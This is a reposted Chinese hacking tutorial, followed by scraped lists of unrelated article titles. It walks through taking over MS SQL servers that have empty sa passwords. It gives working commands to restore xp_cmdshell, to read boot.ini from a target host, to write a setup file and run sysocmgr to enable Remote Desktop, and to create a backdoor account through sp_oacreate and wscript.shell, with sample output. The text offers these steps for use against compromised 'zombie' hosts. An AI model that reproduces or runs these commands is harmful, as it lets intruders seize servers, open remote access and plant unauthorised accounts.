SQL入侵恢复XP_CMDSHLL与开3389
一,用SQL连接器恢复XP_CMDSHLLE的命令
(1)sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
去除
sp_dropextendedproc 'xp_cmdshell'
(3)MSSQL2000
sp_addextendedproc 'xp_cmdshell','xplog70.dll'
修改sa密码 sp_password @old = null, @new = 'complexpwd', @loginame ='sa'
这个很简单,自己堵后门用:)
二,在可以运行XP_CMDSHELL的机器上直接开3389不需要上传的
连接到主机:202.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机
命令:xp_cmdshell "type c:\boot.ini" // 输入命令,看系统,server版的才能 开3389
执行成功,结果:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
命令:xp_cmdshell "echo [Components] > c:\duguxike" //在c盘根目录建写入一个文件,文件名duguxike大家可以自己改为自己的
执行成功,结果:
命令:xp_cmdshell "echo TsEnable = on >> c:\duguxike" //追加写入
执行成功,结果:
命令:xp_cmdshell "type c:\duguxike" //看看duguxike里的内容是否正确
执行成功,结果:
[Components]
TsEnable = on
TsEnable = on
命令:xp_cmdshell "sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\duguxike /q" //开3389,成功的话过会肉机会重启!!
执行成功,结果:
GetLocalManagedApplications returned (2)
之后就看大家的了,不过要记得册除新建的duguxike文件哦!!
三,不需要XP_CMDSHLL直接添加系统帐号,对XPLOG70.DLL被删很有效
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user gchn aaa /add'--
第一条恢复如果XPCMDSHLL被删了
第二条可以执行XPCMDSHELL但是无法利用差异备分来上传的情况下使用(本人WIN2000下测试成功)
第三条XPLOG70.DLL被删除的情况下直接添加帐号前提对方了开了3389 139 23
但是我现在无法在XPLOG70.DLL被删而且没有开3389的机器上拿到系统权限
哪为高人来指点一下!
转载于:https://www.cnblogs.com/baogg/articles/2029946.html
SQL入侵恢复XP_CMDSHLL与开3389相关推荐
- SQL恢复XP_CMDSHLL 以及XPLOG70.DLL被删 直接用SQL连接器开启3389
SQL恢复XP_CMDSHLL 以及XPLOG70.DLL被删 直接用SQL连接器开启3389 用SQL连接器恢复XP_CMDSHLLE的命令 (1)SQL Query Analyzer sp_add ...
- SQL数据库恢复后出现对象名无效(SQL Server备份还原时造成孤立用户的解决方案
SQL数据库恢复后出现对象名无效(SQL Server备份还原时造成孤立用户的解决方案) 2011-04-18 09:38 以碰到这个烦人的问题,恢复的时候自带了个用户,但怎么也删除不掉,select ...
- sql备份恢复数据库_使用DBATools通过SQL恢复数据库操作验证备份
sql备份恢复数据库 In this article, we will explore database backup validation by with SQL restore database ...
- sql server伪列_伪简单SQL Server恢复模型
sql server伪列 This article gives an overview of the Pseudo Simple SQL Server Recovery Model. It also ...
- 数据恢复软件使用经验-支持U盘,手机SD卡,硬盘数据,解决图片恢复后打不开的问题
数据恢复软件使用经验-支持U盘,手机SD卡,硬盘数据,解决图片恢复后打不开的问题. 用过很多数据恢复软件,最早EasyRecovery pro,恢复过U盘,手机SD卡,硬盘数据.但现在下载不了最新版, ...
- 前5名最佳SQL数据库恢复软件
导言 在本文中,我们将研究最优秀的5种SQL数据库恢复软件,这些软件将帮助我们从损坏的.mdf和.ndf文件中恢复和恢复数据库.在这里,我将教您如何操作该软件,以及它们将如何为我们恢复文件. 前5名最 ...
- 红米1s开机android,红米1s恢复出厂设置开不了机的解决方法【图文】
国内的手机发展速度大家已经感受到了吧!假如时间停留在五年前,我们国内的手机市场出现的一些手机品牌不是诺基亚.就是摩托罗拉,这些牌子都是外国手机.而我们再看看现在,市场上的手机品牌国产手机就占了一大半. ...
- sql 数据库 恢复 全攻略
数据库恢复可以分如下几种情况 1.数据库日志保存完整的时候 Log Explorer http://www.ttdown.com/SoftDown.asp?ID=14562 http://js.fix ...
- mysql 使用sql文件恢复数据库
数据库被我误删了,差点就跑路了... 然后从备份的云端导除了sql文件 mysql -u root -p use app; source d:123.sql 本来肯定是不叫123的 方便打字,这样容易 ...
最新文章
- 【Java Web开发指南】Mybatis 中的延迟加载
- Nginx负载均衡实现之用户手动选择与DNS轮询
- 【OCR技术系列之八】端到端不定长文本识别CRNN代码实现
- 学会了PowerBI简单的托托拽拽,是时候学习下DAX了
- Scrapy 爬取京东商城华为全系列手机评论
- JAVA数组子集_【Java虚拟机】JVM系列学习之JVM体系(一)
- 查询服务器硬件配置的命令
- iOS上架被拒理由及相关解决方案记录
- DDL DML DCL 简介
- WEBPACK+ES6+REACT入门(7/7)-React中绑定文本框与state中的值
- Annie——一个简洁强大的轻量级视频下载神器
- html 新浪微博分享申请,新浪微博API申请流程详解
- IC卡读写器c++builder源代码续
- Java的静态数组和动态数组
- C++和C#结构体转换的问题
- Cubieboard安装系统
- saas(sccs)、less、stylus三者的区别
- JavaScript深入浅出(进阶)
- DOjo的一个幻灯片播放例子
- django {%url %}传递参数 url 传参 报错
热门文章
- CETK测试原理/测试方法/测试结果分析以及常见WinCE Test Kit运行问题的排查
- 高性能计算机 和服务器,一种高性能计算机服务器
- c语言如何判断数据是否符合正态分布_统计学里的数据正态性检验
- Java 调用 Caffe_解决 free(): invalid pointer: 0x00000000019ff700 运行时报错(caffe)(libtool使用)...
- 网关和路由器的区别_5G工业路由器与5G DTU的区别介绍详解
- pytorch简单框架
- 前端面试系列-JS 异步编程
- [转载]IIS7报500.23错误的解决方法
- 查找字段 如何 过滤
- protobuf---messge嵌套get set